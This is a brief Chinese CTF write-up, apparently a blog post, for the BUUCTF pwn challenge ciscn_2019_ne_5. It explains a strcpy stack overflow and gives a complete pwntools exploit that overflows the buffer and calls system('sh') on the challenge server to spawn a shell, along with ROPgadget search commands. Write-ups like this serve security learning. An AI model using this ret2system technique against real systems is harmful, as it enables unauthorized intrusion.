【无标题】

小白垃圾笔记,不及阅读

这道题主要是卡在了寻找/bin/sh

看了大佬的题解后才知道查找sh也可以

┌──(root㉿kali)-[~/Desktop/BUUCTF/ciscn_2019_ne_5]
└─# ROPgadget --binary ./ciscn_2019_ne_5  --string 'sh' 
Strings information
============================================================
0x080482ea : sh
 

溢出点是GetFlag中的strcpy函数。、

他会将src内容给dest。可以将payload写入·src然后复制到dest发生溢出,获取shell。

from pwn import *

debug=0
if debug:
    p=process('./ciscn_2019_ne_5')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    #gdb.attach(p)
else:
    p=remote('node4.buuoj.cn',27617)

def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)




ru(b'password:')

se(b'administrator\n')


ru(b'0.Exit\n:')

se(b'1'+b'\n')

ru(b'Please input new log info:')
system_add=0x080484D0

sh_add=0x080482ea

se(b'b'*0x48+b'a'*4+p32(system_add)+b'a'*4+p32(sh_add)+b'\n')


ru(b'0.Exit\n:')


se(b'4'+b'\n')


p.interactive()

#ROPgadget --binary <binary_file> --only "pop|ret" | grep "pop rdi"
#ROPgadget --binary bin --only "pop|ret"
#ROPgadget --binary ./level2_x64 --only "ret"
#ROPgadget --binary ./ciscn_2019_ne_5  --string 'sh' 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值